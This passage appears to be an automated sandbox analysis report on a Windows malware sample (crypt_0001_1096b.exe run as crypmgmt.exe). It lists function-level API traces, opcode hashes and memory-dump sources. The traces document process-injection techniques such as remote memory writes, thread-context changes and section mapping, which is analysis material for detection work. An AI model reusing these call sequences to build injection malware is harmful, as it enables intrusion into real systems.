    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C77DE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: cmd /C "%s> %s1"
  • API String ID: 3817218409-3818503316
  • Opcode ID: 7cb6bc4750e7a2b71a7c8ec6f15424ada8eacba88be2c54c7f9c11c1ab560649
  • Instruction ID: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
  • Opcode Fuzzy Hash: B7E086B50124838B2027B466502AFB5F7463C511E054C261AFA625925B3A4231A6376C
  • Instruction Fuzzy Hash: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7E21, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46 Total matches: 59
Similarity
  • Total matches: 59
  • API ID: StrToIntExmemcpy
  • String ID: 0x
  • API String ID: 149130431-3225541890
  • Opcode ID: da5bbc278911b085aa6d66a47a0cf6d216f6515775abb5fb592028d0f4abd24f
  • Instruction ID: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
  • Opcode Fuzzy Hash: B3D0A750AA2F8381152564850252B35F667F8A2B537CC9F525E00D716A2F52B7762F0B
  • Instruction Fuzzy Hash: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
APIs
  • memcpy.NTDLL(?,?,?), ref: 001C7E65
  • StrToIntExA.SHLWAPI(00007830,00000001,00000000), ref: 001C7E77
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C6241, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: GetModuleHandleTlsAlloc
  • String ID: CHROME.DLL
  • API String ID: 618583884-1627437769
  • Opcode ID: ffb7a85a2e9683169558a98c7eabd5e151ffe081303fc3c2192e4f2d4ebb372b
  • Instruction ID: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
  • Opcode Fuzzy Hash: 9FC02BBC6446841A644631D45E6B2BC8C01E2D23D7D5D2B36EA3730C873F270DEBCA62
  • Instruction Fuzzy Hash: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
APIs
  • GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
  • TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2B66, Relevance: 5.2, APIs: 4, Instructions: 156 Total matches: 79memory
Similarity
  • Total matches: 79
  • API ID: CloseHandleGetLastErrorHeapFreememset
  • String ID:
  • API String ID: 1419005916-0
  • Opcode ID: 760449bbfbed289788199d7c06102e71ba99187f66d499b3f37ec5349a85ff82
  • Instruction ID: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
  • Opcode Fuzzy Hash: 4C1189C5015BD382E6772E01A8A0F60D2429F86B76E4EA731C4BF745DE3D802024B776
  • Instruction Fuzzy Hash: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
APIs
    • Part of subcall function 001C24B7: lstrlen.KERNEL32(001C2246,?,00000000,00000000,001C2B9B,00000000,001C2246,?,00000000,?), ref: 001C24C1
    • Part of subcall function 001C24B7: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C24D6
    • Part of subcall function 001C24B7: HeapFree.KERNEL32(00000000,00000000,001C71E8), ref: 001C251D
  • memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
  • CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2A39: RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C2A39: CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C164D: RtlImageNtHeader.NTDLL(?), ref: 001C165E
    • Part of subcall function 001C164D: RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
    • Part of subcall function 001C164D: GetTickCount.KERNEL32 ref: 001C169C
    • Part of subcall function 001C164D: wsprintfA.USER32 ref: 001C16AC
    • Part of subcall function 001C164D: RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
    • Part of subcall function 001C164D: StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
    • Part of subcall function 001C164D: lstrlen.KERNEL32(00000000), ref: 001C1702
    • Part of subcall function 001C164D: RegCloseKey.ADVAPI32(?), ref: 001C171E
    • Part of subcall function 001C164D: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
    • Part of subcall function 001C1A08: RtlImageNtHeader.NTDLL ref: 001C1A48
    • Part of subcall function 001C1A08: GetCurrentThreadId.KERNEL32 ref: 001C1A5E
    • Part of subcall function 001C1A08: GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
    • Part of subcall function 001C1A08: RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
    • Part of subcall function 001C1A08: wsprintfA.USER32 ref: 001C1B50
    • Part of subcall function 001C1A08: lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
    • Part of subcall function 001C1586: RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
    • Part of subcall function 001C1586: GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
    • Part of subcall function 001C1586: StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
    • Part of subcall function 001C1586: wsprintfA.USER32 ref: 001C15D0
    • Part of subcall function 001C1586: CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
    • Part of subcall function 001C1586: GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
    • Part of subcall function 001C1586: WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
    • Part of subcall function 001C1586: GetLastError.KERNEL32 ref: 001C1615
    • Part of subcall function 001C1586: CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C1586: GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
    • Part of subcall function 001C1586: HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
    • Part of subcall function 001CB8EF: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 001CB919
    • Part of subcall function 001CB8EF: HeapFree.KERNEL32(00000000,00000000), ref: 001CB968
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C1E86: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
    • Part of subcall function 001C1E86: RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001C1E86: lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001C1E86: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001C1EFC: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1F04
    • Part of subcall function 001C2416: lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
    • Part of subcall function 001C2416: RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
    • Part of subcall function 001C2416: lstrcpy.KERNEL32(00000008,?), ref: 001C2462
    • Part of subcall function 001C2416: CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
    • Part of subcall function 001C2416: CloseHandle.KERNEL32(00000000), ref: 001C2485
    • Part of subcall function 001C2416: GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
    • Part of subcall function 001C2416: HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
  • GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
    • Part of subcall function 001C1473: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001C1473: wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001C1473: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D87D7, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: f4522468b970ccd3281ff04b4b9d6df2f9b0077f1de15eaad5e61c015f0d6d70
  • Instruction ID: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
  • Opcode Fuzzy Hash: 2401C052096E60C8F032AD0A54AA77BF147FF917F6D0DFB0064C23028B4E81A1E61FC9
  • Instruction Fuzzy Hash: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
APIs
  • memset.NTDLL ref: 001D87FD
  • memcpy.NTDLL ref: 001D8825
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
  • GetLastError.KERNEL32(00000010,00000218,001E3E3D,00000100,?,00000318,00000008), ref: 001D883C
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,001E3E3D,00000100), ref: 001D891F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE2F9, Relevance: 5.1, APIs: 4, Instructions: 70 Total matches: 113string
Similarity
  • Total matches: 113
  • API ID: lstrcpy$lstrlenmemcpy
  • String ID:
  • API String ID: 2435105219-0
  • Opcode ID: 389011caf0b95c7600b8c5e44240e3f54a572d070d9ef14607482dffdfcb44a1
  • Instruction ID: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
  • Opcode Fuzzy Hash: 19E06834C20EC8A2C527204C1072F45A784999153B9CDA3E7647629AD54E023016720F
  • Instruction Fuzzy Hash: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
APIs
  • lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE305
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE363
  • lstrcpy.KERNEL32(00000000,00000008), ref: 001DE373
  • lstrcpy.KERNEL32(00000000,00000000), ref: 001DE37F
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

Process Name: crypmgmt.exe Analysis ID: 64003

General

Root Process Name:d3d8sext.exe
Process MD5:34C71A2B5584813A6BC94888E3669320
Total matches:156
Initial Analysis Report:Open
Initial sample Analysis ID:64003
Initial sample SHA 256:34CD6B92357754175CDC0BCA3CDA8C2AA439CDFBCC03683EE3B3D502E4C71151
Initial sample name:crypt_0001_1096b.exe

Similar Executed Functions

Function 001CDA13, Relevance: 10.6, APIs: 7, Instructions: 111 Total matches: 36string
Similarity
  • Total matches: 36
  • API ID: CreateEventGetLastErrorRtlAddVectoredExceptionHandlerRtlRemoveVectoredExceptionHandlerStrRChr_struprlstrlen
  • String ID:
  • API String ID: 1244505096-0
  • Opcode ID: e7bdade24c4945e58ca902ffe0c9ca2f3df43dc30c200f231c9832c7f3637fe3
  • Instruction ID: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
  • Opcode Fuzzy Hash: 0AF099380984018E452FA8A8581471E4B0CB4827DB68C7F17FDE81006E5F4FF0E05FA9
  • Instruction Fuzzy Hash: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
APIs
  • StrRChrA.SHLWAPI(001EB090,00000000,0000005C), ref: 001CDA47
  • _strupr.NTDLL ref: 001CDA5D
  • lstrlen.KERNEL32(001EB090,?,001EC638), ref: 001CDA65
    • Part of subcall function 001D99D2: NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
    • Part of subcall function 001D99D2: NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
    • Part of subcall function 001D99D2: memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001D99D2: NtClose.NTDLL(001EC638), ref: 001D9A84
    • Part of subcall function 001D99D2: NtClose.NTDLL(?), ref: 001D9A8E
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,001EC638), ref: 001CDAE5
  • RtlAddVectoredExceptionHandler.NTDLL(00000000,001CD036), ref: 001CDB0C
    • Part of subcall function 001CD519: memset.NTDLL ref: 001CD561
    • Part of subcall function 001CD519: CreateMutexA.KERNEL32(00000000,00000001,00000000,0000005C,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD59C
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD5A7
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(001EB020), ref: 001CD5BF
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CD617
    • Part of subcall function 001CD519: NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 001CD65C
    • Part of subcall function 001CD519: OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD671
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD67B
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(00000000), ref: 001CD689
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000018), ref: 001CD716
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD79E
    • Part of subcall function 001CD519: LoadLibraryA.KERNEL32(001EC000), ref: 001CD7A9
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000071), ref: 001CD821
    • Part of subcall function 001CD519: wsprintfA.USER32 ref: 001CD849
  • GetLastError.KERNEL32(?,?,?,001EC638), ref: 001CDB26
  • RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CDB3C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D99D2, Relevance: 10.6, APIs: 7, Instructions: 81 Total matches: 84native
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: 14313892d018c28c1512d211c24bd9508d3a727c070e1f2f8c81eb1ee10ca15e
  • Instruction ID: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
  • Opcode Fuzzy Hash: 65E061A35807C6FB51DA20701C03DE6D691FE10790C4C5B26D4F82D1864E5574794B07
  • Instruction Fuzzy Hash: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
APIs
  • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
  • NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
  • memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • NtClose.NTDLL(001EC638), ref: 001D9A84
  • NtClose.NTDLL(?), ref: 001D9A8E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B33880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 57d5b69842fa9f20cc0ac7374aaf72f9f3e4042206c472131978e9752df15512
  • Instruction ID: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
  • Opcode Fuzzy Hash: 09F078400B9F90E6E812A68604A2F406692FF06E75E0EE32475F211B8A3F12311D8B06
  • Instruction Fuzzy Hash: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
APIs
  • memset.NTDLL ref: 01B338A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 01B33995
    • Part of subcall function 01B33E68: NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
    • Part of subcall function 01B33E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
    • Part of subcall function 01B33E68: SetLastError.KERNEL32(00000000), ref: 01B33EA7
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
  • memcpy.NTDLL(00000218,01B34F92,00000100,?,00010003,?,?,00000318,00000008), ref: 01B3391D
    • Part of subcall function 01B33E27: NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
    • Part of subcall function 01B33E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
    • Part of subcall function 01B33E27: SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 01B33974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33977
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B3278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: f060986f037786d6eff44f917c1f9cd1492eae5187663b5233982b63c154d879
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: A6E0C00114CEC4E7E9F2B8060843B2BA0507FC0942E5D7BA173A88952F1F20B012070A
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
  • memset.NTDLL ref: 01B3280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
  • NtClose.NTDLL(?), ref: 01B3283F
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001F1040, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 226 Total matches: 134native
Similarity
  • Total matches: 134
  • API ID: NtProtectVirtualMemory
  • String ID: z
  • API String ID: 1546459799-1657960367
  • Opcode ID: cf60b7cb83ce32be4ff946b1fad70a6d95e18f7d6e657a237c07f6ddb8ba3109
  • Instruction ID: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
  • Opcode Fuzzy Hash: C321CD43048F92C7E9BB64801117F962385FBA3C6AD88FB625EA0576571F0036079FAB
  • Instruction Fuzzy Hash: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
APIs
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F11E1
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F124B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665752385.001F1000.00000040.sdmp, Offset: 001F1000, based on PE: false
Function 01B33E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 09b8888f5fea2438ba07c33a5d99fafd9b808ca60c6c542fde1a50af119b8c2c
  • Instruction ID: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
  • Opcode Fuzzy Hash: 42C012800D5D81E6957F54890169A165197BB91600C3D73363184AD5807FA032190F09
  • Instruction Fuzzy Hash: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
APIs
  • NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
  • SetLastError.KERNEL32(00000000), ref: 01B33EA7
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B33DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: 153371e7e4f27683f8f1e7324a073917f20e70acda51c493c57c8daf0af629c8
  • Instruction ID: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
  • Opcode Fuzzy Hash: 09C09BC7021DC54DD779698201B5C45C1C57EB177243C710D5054DD31D518931274E85
  • Instruction Fuzzy Hash: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
  • SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B33E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 36b500c4af3d78682ecbfd6e0cb23a776f8586d0295add1c103b4d2a2a554bea
  • Instruction ID: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
  • Opcode Fuzzy Hash: 9EC09B87020DC54DD779694101B9C45C0C57FB177243C710D5058DD31D518931274F85
  • Instruction Fuzzy Hash: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
  • SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B32E04, Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 251 Total matches: 146registrystringmemory
Similarity
